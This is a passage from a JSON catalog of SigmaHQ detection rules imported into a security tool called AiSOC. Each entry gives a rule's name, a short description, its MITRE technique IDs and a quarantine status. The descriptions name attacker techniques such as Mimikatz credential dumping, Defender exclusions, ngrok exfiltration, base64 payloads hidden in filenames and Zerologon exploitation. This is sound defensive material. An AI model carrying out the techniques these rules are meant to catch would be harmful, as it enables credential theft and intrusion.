"detections/sigma-imports/_quarantine/powershell-shellcode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" } }, { "id": "sigmahq-sigma-16c37b52-b141-42a5-a3ea-bbe098444397", "type": "detection", "name": "Suspect Svchost Activity", "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspect-svchost-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16c37b52-b141-42a5-a3ea-bbe098444397", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml" } }, { "id": "sigmahq-sigma-16c86189-b556-4ee8-b4c7-7e350a195a4f", "type": "detection", "name": "Potential Server Side Template Injection In Velocity", "description": "Detects exceptions in velocity template renderer, this most likely happens due to dynamic rendering of user input and may lead to RCE.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-server-side-template-injection-in-velocity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16c86189-b556-4ee8-b4c7-7e350a195a4f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/velocity/velocity_ssti_injection.yml" } }, { "id": "sigmahq-sigma-16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "type": "detection", "name": "RottenPotato Like Attack Pattern", "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rottenpotato-like-attack-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_susp_rottenpotato.yml" } }, { "id": "sigmahq-sigma-16fe46bb-4f64-46aa-817d-ff7bec4a2352", "type": "detection", "name": "LiveKD Driver Creation", "description": "Detects the creation of the LiveKD driver, which is used for live kernel debugging", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/livekd-driver-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "16fe46bb-4f64-46aa-817d-ff7bec4a2352", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver.yml" } }, { "id": "sigmahq-sigma-1712bafe-be05-4a0e-89d4-17a3ed151bf5", "type": "detection", "name": "Potential Hello-World Scraper Botnet Activity", "description": "Detects network traffic potentially associated with a scraper botnet variant that uses the \"Hello-World/1.0\" user-agent string.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-hello-world-scraper-botnet-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1712bafe-be05-4a0e-89d4-17a3ed151bf5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_hello_world_user_agent.yml" } }, { "id": "sigmahq-sigma-1723e720-616d-4ddc-ab02-f7e3685a4713", "type": "detection", "name": "Rundll32 Spawned Via Explorer.EXE", "description": "Detects execution of \"rundll32.exe\" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-spawned-via-explorer-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1723e720-616d-4ddc-ab02-f7e3685a4713", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" } }, { "id": "sigmahq-sigma-174afcfa-6e40-4ae9-af64-496546389294", "type": "detection", "name": "Credential Dumping Attempt Via Svchost", "description": "Detects when a process tries to access the memory of svchost to potentially dump credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credential-dumping-attempt-via-svchost.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "174afcfa-6e40-4ae9-af64-496546389294", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_svchost_credential_dumping.yml" } }, { "id": "sigmahq-sigma-175997c5-803c-4b08-8bb0-70b099f47595", "type": "detection", "name": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-compress-obfuscation-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "175997c5-803c-4b08-8bb0-70b099f47595", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml" } }, { "id": "sigmahq-sigma-1775e15e-b61b-4d14-a1a3-80981298085a", "type": "detection", "name": "Rundll32 Execution Without CommandLine Parameters", "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-execution-without-commandline-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1775e15e-b61b-4d14-a1a3-80981298085a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_no_params.yml" } }, { "id": "sigmahq-sigma-17769c90-230e-488b-a463-e05c08e9d48f", "type": "detection", "name": "Powershell Defender Exclusion", "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-defender-exclusion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "17769c90-230e-488b-a463-e05c08e9d48f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" } }, { "id": "sigmahq-sigma-178e615d-e666-498b-9630-9ed363038101", "type": "detection", "name": "Elevated System Shell Spawned From Uncommon Parent Location", "description": "Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/elevated-system-shell-spawned-from-uncommon-parent-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "178e615d-e666-498b-9630-9ed363038101", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml" } }, { "id": "sigmahq-sigma-179b3686-6271-4d87-807d-17d843a8af73", "type": "detection", "name": "Suspicious Filename with Embedded Base64 Commands", "description": "Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts.\nThese filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.004", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-filename-with-embedded-base64-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "179b3686-6271-4d87-807d-17d843a8af73", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_susp_filename_with_embedded_base64_command.yml" } }, { "id": "sigmahq-sigma-17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "type": "detection", "name": "Suspicious New Service Creation", "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-new-service-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_service_creation.yml" } }, { "id": "sigmahq-sigma-17d619c1-e020-4347-957e-1d1207455c93", "type": "detection", "name": "Active Directory Replication from Non Machine Account", "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-replication-from-non-machine-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "17d619c1-e020-4347-957e-1d1207455c93", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" } }, { "id": "sigmahq-sigma-17e53739-a1fc-4a62-b1b9-87711c2d5e44", "type": "detection", "name": "Python Function Execution Security Warning Disabled In Excel - Registry", "description": "Detects changes to the registry value \"PythonFunctionWarnings\" that would prevent any warnings or alerts from showing when Python functions are about to be executed.\nThreat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-function-execution-security-warning-disabled-in-excel-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "17e53739-a1fc-4a62-b1b9-87711c2d5e44", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_disable_python_security_warnings.yml" } }, { "id": "sigmahq-sigma-17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35", "type": "detection", "name": "Suspicious File Download From IP Via Wget.EXE", "description": "Detects potentially suspicious file downloads directly from IP addresses using Wget.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-download-from-ip-via-wget-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wget_download_direct_ip.yml" } }, { "id": "sigmahq-sigma-180c7c5c-d64b-4a63-86e9-68910451bc8b", "type": "detection", "name": "Potential File Download Via MS-AppInstaller Protocol Handler", "description": "Detects usage of the \"ms-appinstaller\" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE\nThe downloaded files are temporarly stored in \":\\Users\\%username%\\AppData\\Local\\Packages\\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\\AC\\INetCache\\\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-file-download-via-ms-appinstaller-protocol-handler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "180c7c5c-d64b-4a63-86e9-68910451bc8b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml" } }, { "id": "sigmahq-sigma-1816994b-42e1-4fb1-afd2-134d88184f71", "type": "detection", "name": "PowerShell Base64 Encoded WMI Classes", "description": "Detects calls to base64 encoded WMI class such as \"Win32_ShadowCopy\", \"Win32_ScheduledJob\", etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-base64-encoded-wmi-classes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1816994b-42e1-4fb1-afd2-134d88184f71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml" } }, { "id": "sigmahq-sigma-18249279-932f-45e2-b37a-8925f2597670", "type": "detection", "name": "Process Initiated Network Connection To Ngrok Domain", "description": "Detects an executable initiating a network connection to \"ngrok\" domains.\nAttackers were seen using this \"ngrok\" in order to store their second stage payloads and malware.\nWhile communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1572", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-initiated-network-connection-to-ngrok-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18249279-932f-45e2-b37a-8925f2597670", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_ngrok.yml" } }, { "id": "sigmahq-sigma-185d7418-f250-42d0-b72e-0c8b70661e93", "type": "detection", "name": "Suspicious Diantz Download and Compress Into a CAB File", "description": "Download and compress a remote file and store it in a cab file on local machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-diantz-download-and-compress-into-a-cab-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "185d7418-f250-42d0-b72e-0c8b70661e93", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" } }, { "id": "sigmahq-sigma-18749301-f1c5-4efc-a4c3-276ff1f5b6f8", "type": "detection", "name": "Use of VSIISExeLauncher.exe", "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-vsiisexelauncher-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" } }, { "id": "sigmahq-sigma-1883444f-084b-419b-ac62-e0d0c5b3693f", "type": "detection", "name": "Suspicious Connection to Remote Account", "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-connection-to-remote-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1883444f-084b-419b-ac62-e0d0c5b3693f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" } }, { "id": "sigmahq-sigma-18988e1b-9087-4f8a-82fe-0414dce49878", "type": "detection", "name": "Execute Code with Pester.bat as Parent", "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execute-code-with-pester-bat-as-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18988e1b-9087-4f8a-82fe-0414dce49878", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pester.yml" } }, { "id": "sigmahq-sigma-189e3b02-82b2-4b90-9662-411eb64486d4", "type": "detection", "name": "Potential Invoke-Mimikatz PowerShell Script", "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-invoke-mimikatz-powershell-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "189e3b02-82b2-4b90-9662-411eb64486d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" } }, { "id": "sigmahq-sigma-18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", "type": "detection", "name": "Buffer Overflow Attempts", "description": "Detects buffer overflow attempts in Unix system log files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/buffer-overflow-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_buffer_overflows.yml" } }, { "id": "sigmahq-sigma-18b88d08-d73e-4f21-bc25-4b9892a4fdd0", "type": "detection", "name": "PST Export Alert Using eDiscovery Alert", "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pst-export-alert-using-ediscovery-alert.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_pst_export_alert.yml" } }, { "id": "sigmahq-sigma-18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", "type": "detection", "name": "Sysmon Channel Reference Deletion", "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-channel-reference-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" } }, { "id": "sigmahq-sigma-18ee686c-38a3-4f65-9f44-48a077141f42", "type": "detection", "name": "Uncommon Extension Shim Database Installation Via Sdbinst.EXE", "description": "Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-extension-shim-database-installation-via-sdbinst-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18ee686c-38a3-4f65-9f44-48a077141f42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sdbinst_susp_extension.yml" } }, { "id": "sigmahq-sigma-18f2065c-d36c-464a-a748-bcf909acb2e3", "type": "detection", "name": "Wow6432Node Classes Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wow6432node-classes-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18f2065c-d36c-464a-a748-bcf909acb2e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" } }, { "id": "sigmahq-sigma-18f37338-b9bd-4117-a039-280c81f7a596", "type": "detection", "name": "Zerologon Exploitation Using Well-known Tools", "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/zerologon-exploitation-using-well-known-tools.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18f37338-b9bd-4117-a039-280c81f7a596", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 